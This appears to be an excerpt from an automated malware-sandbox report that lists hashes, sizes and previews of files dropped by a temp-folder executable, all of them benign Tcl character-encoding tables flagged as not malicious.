                                                                                                                                                                                                                                                                                                                                SSDEEP:1536:fimT/rTarSdgL6MVTCwCWUw62Ljv10xb+KYTuHEh:ftT/IQYLzGxSdCy
                                                                                                                                                                                                                                                                                                                                MD5:6788B104D2297CBD8D010E2776AF6EBA
                                                                                                                                                                                                                                                                                                                                SHA1:904A8B7846D34521634C8C09013DBB1D31AF47CA
                                                                                                                                                                                                                                                                                                                                SHA-256:26BCB620472433962717712D04597A63264C8E444459432565C4C113DE0A240B
                                                                                                                                                                                                                                                                                                                                SHA-512:0DF73561B76159D0A94D16A2DAB22F2B3D88C67146A840CB74D19E70D50A4C7E4DDF1952B5B805471985A896CA9F1B69C3FC4E6D8D17454566D7D39377BA1394
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# Encoding file: cp949, multi-byte.M.003F 0 125.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.0080000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.000000000000000000000000000000000000000
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):91831
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.253346615914323
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:768:VkkmY4kD7HGJxYXIdjQW7GzvKHBDViIM1sbh+dJE+FKw0sXlWVvDg21jjA:mGfKqIQwGzv8D7ksb2Ur79jjA
                                                                                                                                                                                                                                                                                                                                MD5:A0F8C115D46D02A5CE2B8C56AFF53235
                                                                                                                                                                                                                                                                                                                                SHA1:6605FCCB235A08F9032BB45231B1A6331764664B
                                                                                                                                                                                                                                                                                                                                SHA-256:1FB9A3D52D432EA2D6CD43927CEBF9F58F309A236E1B11D20FE8D5A5FB944E6E
                                                                                                                                                                                                                                                                                                                                SHA-512:124EA2134CF59585DB2C399B13DE67089A6BB5412D2B210DF484FA38B77555AAF0605D04F441BDC2B0BE0F180FA17C145731D7826DA7556A573D357CC00A968F
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# Encoding file: cp950, multi-byte.M.003F 0 88.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.0080008100820083008400850086008700880089008A008B008C008D008E008F.0090009100920093009400950096009700980099009A009B009C009D009E009F.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1093
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.7149721845090347
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:vJM0UmJvRjuyfqYCsUBOdXBCbtwHviANskfUPiXFtoE4OSFgHrBPkq:vKfmOEqYCs6CXRPiANIiXFt9XSMdPH
                                                                                                                                                                                                                                                                                                                                MD5:7715CC78774FEA9EB588397D8221FA5B
                                                                                                                                                                                                                                                                                                                                SHA1:6A21D57B44A0856ABCDE61B1C16CB93F4E4C3D74
                                                                                                                                                                                                                                                                                                                                SHA-256:3BDE9AE7EAF9BE799C84B2AA4E80D78BE8ACBACA1E486F10B9BDD42E3AEDDCB2
                                                                                                                                                                                                                                                                                                                                SHA-512:C7500B9DD36F7C92C1A92B8F7BC507F6215B12C26C8CB4564A8A87299859C29C05DEFD3212DE8F2DB76B7DFAB527D6C7B10D1E9A9F6B682F1B5BC4911CFAD26C
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# Encoding file: dingbats, single-byte.S.003F 1 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.00202701270227032704260E2706270727082709261B261E270C270D270E270F.2710271127122713271427152716271727182719271A271B271C271D271E271F.2720272127222723272427252726272726052729272A272B272C272D272E272F.2730273127322733273427352736273727382739273A273B273C273D273E273F.2740274127422743274427452746274727482749274A274B25CF274D25A0274F.27502751275225B225BC25C6275625D727582759275A275B275C275D275E007F.0080008100820083008400850086008700880089008A008B008C008D008E008F.0090009100920093009400950096009700980099009A009B009C009D009E009F.0000276127622763276427652766276726632666266526602460246124622463.2464246524662467246824692776277727782779277A277B277C277D277E277F.2780278127822783278427852786278727882789278A278B278C278D278E278F.2790279127922793279421922194219527982799279A279B279C279D279E279F.27A027A127A227A327A427A527A627A727A82
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1054
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):2.92745681322567
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:scICJZoBqoQzRKCGW5JyY9yZk3Vvd2p4Z4XgiAmV3q:JmqrRKCtEYYZk3V4WSwitV6
                                                                                                                                                                                                                                                                                                                                MD5:67212AAC036FE54C8D4CDCB2D03467A6
                                                                                                                                                                                                                                                                                                                                SHA1:465509C726C49680B02372501AF7A52F09AB7D55
                                                                                                                                                                                                                                                                                                                                SHA-256:17A7D45F3B82F2A42E1D36B13DB5CED077945A3E82700947CD1F803DD2A60DBF
                                                                                                                                                                                                                                                                                                                                SHA-512:9500685760800F5A31A755D582FCEDD8BB5692C27FEEEC2709D982C0B8FCB5238AFB310DCB817F9FE140086A8889B7C60D5D1017764CEB03CB388DD22C8E0B3E
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:S.006F 0 1.00.0000000100020003008500090086007F0087008D008E000B000C000D000E000F.0010001100120013008F000A0008009700180019009C009D001C001D001E001F.0080008100820083008400920017001B00880089008A008B008C000500060007.0090009100160093009400950096000400980099009A009B00140015009E001A.002000A000E200E400E000E100E300E500E700F10060002E003C0028002B007C.002600E900EA00EB00E800ED00EE00EF00EC00DF00210024002A0029003B009F.002D002F00C200C400C000C100C300C500C700D1005E002C0025005F003E003F.00F800C900CA00CB00C800CD00CE00CF00CC00A8003A002300400027003D0022.00D800610062006300640065006600670068006900AB00BB00F000FD00FE00B1.00B0006A006B006C006D006E006F00700071007200AA00BA00E600B800C600A4.00B500AF0073007400750076007700780079007A00A100BF00D000DD00DE00AE.00A200A300A500B700A900A700B600BC00BD00BE00AC005B005C005D00B400D7.00F900410042004300440045004600470048004900AD00F400F600F200F300F5.00A6004A004B004C004D004E004F00500051005200B900FB00FC00DB00FA00FF.00D900F70053005400550056005700580059005A00B200D400D600D200D300D5.00300031003
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):85574
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):2.3109636068522357
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:384:SgOycCs6mBixg1k6y8NMSwR8JMvz6VaVZmASVHBtGtRfS7FXtQ/RSJj9fNLSmXn/:SdC4BmCkjSwAO6VIrahNrVNTSYG3Oln
                                                                                                                                                                                                                                                                                                                                MD5:9A60E5D1AB841DB3324D584F1B84F619
                                                                                                                                                                                                                                                                                                                                SHA1:BCCC899015B688D5C426BC791C2FCDE3A03A3EB5
                                                                                                                                                                                                                                                                                                                                SHA-256:546392237F47D71CEE1DAA1AAE287D94D93216A1FABD648B50F59DDCE7E8AE35
                                                                                                                                                                                                                                                                                                                                SHA-512:E9F42B65A8DFB157D1D3336A94A83D372227BAA10A82EB0C6B6FB5601AA352A576FA3CDFD71EDF74A2285ABCA3B1D3172BB4B393C05B3B4AB141AAF04B10F426
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# Encoding file: euc-cn, multi-byte.M.003F 0 82.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.0080008100820083008400850086008700880089008A008B008C008D008E008F.0090009100920093009400950096009700980099009A009B009C009D009E009F.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.000000000000000000000000000000000000000
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):82537
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):2.267779266005065
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:384:c7C2o8+/s5VHxANqsFvGFkMpUEg4MWv947ebZ745zIPcvZ3p6JhE1mrUH2xUoSuL:U+UTHxAlFxkUeGcOmaj6JhEMrUwLf3d1
                                                                                                                                                                                                                                                                                                                                MD5:453626980EB36062E32D98ACECCCBD6E
                                                                                                                                                                                                                                                                                                                                SHA1:F8FCA3985009A2CDD397CB3BAE308AF05B0D7CAC
                                                                                                                                                                                                                                                                                                                                SHA-256:3BFB42C4D36D1763693AEFCE87F6277A11AD5A756D691DEDA804D9D0EDCB3093
                                                                                                                                                                                                                                                                                                                                SHA-512:0F026E1EF3AE1B08BBC7050DB0B181B349511F2A526D2121A6100C426674C0FB1AD6904A5CC11AA924B7F03E33F6971599BAF85C94528428F2E22DCB7D6FE443
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# Encoding file: euc-jp, multi-byte.M.003F 0 79.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.0080008100820083008400850086008700880089008A008B008C008D0000008F.0090009100920093009400950096009700980099009A009B009C009D009E009F.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.000000000000000000000000000000000000000
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):93918
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):2.3267174168729032
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:768:1/W3oNwgt2qyVY1OVxk6ZN4KYDN1uq44hohExh:1/W3pqv10xb+KYTuHEh
                                                                                                                                                                                                                                                                                                                                MD5:93FEADA4D8A974E90E77F6EB8A9F24AB
                                                                                                                                                                                                                                                                                                                                SHA1:89CDA4FE6515C9C03551E4E1972FD478AF3A419C
                                                                                                                                                                                                                                                                                                                                SHA-256:1F1AD4C4079B33B706E948A735A8C3042F40CC68065C48C220D0F56FD048C33B
                                                                                                                                                                                                                                                                                                                                SHA-512:7FC43C273F8C2A34E7AD29375A36B6CAC539AC4C1CDCECFAF0B366DCFE605B5D924D09DAD23B2EE589B1A8A63EE0F7A0CE32CE74AC873369DE8555C9E27A5EDF
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# Encoding file: euc-kr, multi-byte.M.003F 0 90.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.0080008100820083008400850086008700880089008A008B008C008D008E008F.0090009100920093009400950096009700980099009A009B009C009D009E009F.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.000000000000000000000000000000000000000
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):86619
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):2.2972446758995697
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:384:XSeUMIZQkyMiS4Y3fPOYo55XVi684z6WwQrrNoTRoyzDciB126afGG9whRJGAy/I:XhcQjSr3XeXVbmWdWd/zl5auG2hU/I
                                                                                                                                                                                                                                                                                                                                MD5:12DBEEF45546A01E041332427FEC7A51
                                                                                                                                                                                                                                                                                                                                SHA1:5C8E691AE3C13308820F4CF69206D765CFD5094B
                                                                                                                                                                                                                                                                                                                                SHA-256:0C0DF17BFECE897A1DA7765C822453B09866573028CECCED13E2EFEE02BCCCC4
                                                                                                                                                                                                                                                                                                                                SHA-512:FC8A250EE17D5E94A765AFCD9464ECAE74A4E2FF594A8632CEAEC5C84A3C4D26599642DA42E507B7873C37849D3E784CFB0792DE5B4B4262428619D7473FF611
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# Encoding file: gb12345, double-byte.D.233F 0 83.21.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.000030003001300230FB02C902C700A8300330052015FF5E2225202620182019.201C201D3014301530083009300A300B300C300D300E300F3016301730103011.00B100D700F72236222722282211220F222A222922082237221A22A522252220.23122299222B222E2261224C2248223D221D2260226E226F22642265221E2235.22342642264000B0203220332103FF0400A4FFE0FFE1203000A7211626062605.25CB25CF25CE25C725C625A125A025B325B2203B219221902191219330130000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1091
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.1978221748141253
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:qrmTUmJvRju36hVbsZiAMiZyb7PN8pUPnfk5JM0RHFj:qSgmO8VIwAMiw/PNPQPFj
                                                                                                                                                                                                                                                                                                                                MD5:06645FE6C135D2EDE313629D24782F98
                                                                                                                                                                                                                                                                                                                                SHA1:49C663AC26C1FE4F0FD1428C9EF27058AEE6CA95
                                                                                                                                                                                                                                                                                                                                SHA-256:A2717AE09E0CF2D566C245DC5C5889D326661B40DB0D5D9A6D95B8E6B0F0E753
                                                                                                                                                                                                                                                                                                                                SHA-512:DB544CFE58753B2CF8A5D65321A2B41155FE2430DB6783DD2F20E1244657482072633D16C8AC99765C113B60E99C8718263C483763A34C5E4BB04B4FFBA41976
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# Encoding file: gb1988, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.002000210022002300A500250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D203E007F.0080008100820083008400850086008700880089008A008B008C008D008E008F.0090009100920093009400950096009700980099009A009B009C009D009E009F.0000FF61FF62FF63FF64FF65FF66FF67FF68FF69FF6AFF6BFF6CFF6DFF6EFF6F.FF70FF71FF72FF73FF74FF75FF76FF77FF78FF79FF7AFF7BFF7CFF7DFF7EFF7F.FF80FF81FF82FF83FF84FF85FF86FF87FF88FF89FF8AFF8BFF8CFF8DFF8EFF8F.FF90FF91FF92FF93FF94FF95FF96FF97FF98FF99FF9AFF9BFF9CFF9DFF9EFF9F.000000000000000000000000000000000000000
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):84532
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):2.3130049332819502
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:384:KSevutIzbwixZ1J9vS+MReR8cMvwKVDAcmaj8HEtG0waFtFsKQ2RzIjTfYahm6n3:Kat+wmTJYReltKVMeYkXOjYo5tG3VN+
                                                                                                                                                                                                                                                                                                                                MD5:BF74C90D28E52DD99A01377A96F462E3
                                                                                                                                                                                                                                                                                                                                SHA1:DBA09C670F24D47B95D12D4BB9704391B81DDA9A
                                                                                                                                                                                                                                                                                                                                SHA-256:EC11BFD49C715CD89FB9D387A07CF54261E0F4A1CCEC1A810E02C7B38AD2F285
                                                                                                                                                                                                                                                                                                                                SHA-512:8F5A86BB57256ED2412F6454AF06C52FB44C83EB7B820C642CA9216E9DB31D6EC22965BF5CB9E8AE4492C77C1F48EB2387B1CBDC80F6CDA33FA57C57EC9FF9CD
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# Encoding file: gb2312, double-byte.D.233F 0 81.21.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.000030003001300230FB02C902C700A8300330052015FF5E2225202620182019.201C201D3014301530083009300A300B300C300D300E300F3016301730103011.00B100D700F72236222722282211220F222A222922082237221A22A522252220.23122299222B222E2261224C2248223D221D2260226E226F22642265221E2235.22342642264000B0203220332103FF0400A4FFE0FFE1203000A7211626062605.25CB25CF25CE25C725C625A125A025B325B2203B219221902191219330130000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.00000000000000000000000000000000000000
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):85574
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):2.3109636068522357
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:384:SgOycCs6mBixg1k6y8NMSwR8JMvz6VaVZmASVHBtGtRfS7FXtQ/RSJj9fNLSmXn/:SdC4BmCkjSwAO6VIrahNrVNTSYG3Oln
                                                                                                                                                                                                                                                                                                                                MD5:9A60E5D1AB841DB3324D584F1B84F619
                                                                                                                                                                                                                                                                                                                                SHA1:BCCC899015B688D5C426BC791C2FCDE3A03A3EB5
                                                                                                                                                                                                                                                                                                                                SHA-256:546392237F47D71CEE1DAA1AAE287D94D93216A1FABD648B50F59DDCE7E8AE35
                                                                                                                                                                                                                                                                                                                                SHA-512:E9F42B65A8DFB157D1D3336A94A83D372227BAA10A82EB0C6B6FB5601AA352A576FA3CDFD71EDF74A2285ABCA3B1D3172BB4B393C05B3B4AB141AAF04B10F426
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# Encoding file: euc-cn, multi-byte.M.003F 0 82.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.0080008100820083008400850086008700880089008A008B008C008D008E008F.0090009100920093009400950096009700980099009A009B009C009D009E009F.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.000000000000000000000000000000000000000
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):192
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.915818681498601
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SOd5MNXVSVLqRIBXSl1AEXMV/RRDfANDemSjs5dqcRcRZMvs5BCUNZ:SVNFS01K+MtkvSjwqd9NZ
                                                                                                                                                                                                                                                                                                                                MD5:224219C864280FA5FB313ADBC654E37D
                                                                                                                                                                                                                                                                                                                                SHA1:39E20B41CFA8B269377AFA06F9C4D66EDD946ACB
                                                                                                                                                                                                                                                                                                                                SHA-256:E12928E8B5754D49D0D3E799135DE2B480BA84B5DBAA0E350D9846FA67F943EC
                                                                                                                                                                                                                                                                                                                                SHA-512:6E390D83B67E2FD5BCAC1BA603A9C6F8BE071FA64021612CE5F8EE33FD8E3840A8C31A7B00134A0039E46BDC66BEF7EB6EA1F8663BA72816B86AF792EF7BDC56
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# Encoding file: iso2022-jp, escape-driven.E.name..iso2022-jp.init..{}.final..{}.ascii..\x1b(B.jis0201..\x1b(J.jis0208..\x1b$B.jis0208..\x1b$@.jis0212..\x1b$(D.gb2312..\x1b$A.ksc5601..\x1b$(C.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):115
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.945508829557185
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SOd5MNXVTEXIBXSl1AEXNELmUHhqQc6XfUNOvn:SVNFS1K+9Qc6sNA
                                                                                                                                                                                                                                                                                                                                MD5:F6464F7C5E3F642BC3564D59B888C986
                                                                                                                                                                                                                                                                                                                                SHA1:94C5F39256366ABB68CD67E3025F177F54ECD39D
                                                                                                                                                                                                                                                                                                                                SHA-256:6AC0F1845A56A1A537B9A6D9BCB724DDDF3D3A5E61879AE925931B1C0534FBB7
                                                                                                                                                                                                                                                                                                                                SHA-512:B9A7E0A9344D8E883D44D1A975A7C3B966499D34BA6206B15C90250F88A8FA422029CEF190023C4E4BE806791AC3BEA87FD8872B47185B0CE0F9ED9C38C41A84
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# Encoding file: iso2022-kr, escape-driven.E.name..iso2022-kr.init..\x1b$)C.final..{}.iso8859-1.\x0f.ksc5601..\x0e.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):226
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.925633473589168
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SOd5MNXVUW+IBXSl1AEXM56DfqQc6WHmSjs5dReQSXcRcRZMvs5BCUNxXeR5IHRv:SVNFUX1K+M55Qc6WGSjwRDSXd9NGIHRv
                                                                                                                                                                                                                                                                                                                                MD5:745464FF8692E3C3D8EBBA38D23538C8
                                                                                                                                                                                                                                                                                                                                SHA1:9D6F077598A5A86E6EB6A4EEC14810BF525FBD89
                                                                                                                                                                                                                                                                                                                                SHA-256:753DDA518A7E9F6DC0309721B1FAAE58C9661F545801DA9F04728391F70BE2D0
                                                                                                                                                                                                                                                                                                                                SHA-512:E919677CC96DEF4C75126A173AF6C229428731AB091CDDBB2A6CE4EB82BCD8191CE64A33B418057A15E094A48E846BEE7820619E414E7D90EDA6E2B66923DDA5
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# Encoding file: iso2022, escape-driven.E.name..iso2022.init..{}.final..{}.iso8859-1.\x1b(B.jis0201..\x1b(J.gb1988..\x1b(T.jis0208..\x1b$B.jis0208..\x1b$@.jis0212..\x1b$(D.gb2312..\x1b$A.ksc5601..\x1b$(C.jis0208..\x1b&@\x1b$B.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1094
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.163043970763833
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:iyTUmJvRju3ShVbsZiAMiZyb7P4UPvvPNNAkbnMH+tjg:iygmOEVIwAMiw/PTvok7zE
                                                                                                                                                                                                                                                                                                                                MD5:E3BAE26F5D3D9A4ADCF5AE7D30F4EC38
                                                                                                                                                                                                                                                                                                                                SHA1:A71B6380EA3D23DC0DE11D3B8CEA86A4C8063D47
                                                                                                                                                                                                                                                                                                                                SHA-256:754EF6BF3A564228AB0B56DDE391521DCC1A6C83CFB95D4B761141E71D2E8E87
                                                                                                                                                                                                                                                                                                                                SHA-512:AFED8F5FE02A9A30987736F08B47F1C19339B5410D6020CC7EA37EA0D717A70AF6CDDC775F53CE261FCF215B579206E56458D61AB4CEB44E060BD6B3AC2F4C41
                                                                                                                                                                                                                                                                                                                                Malicious:false
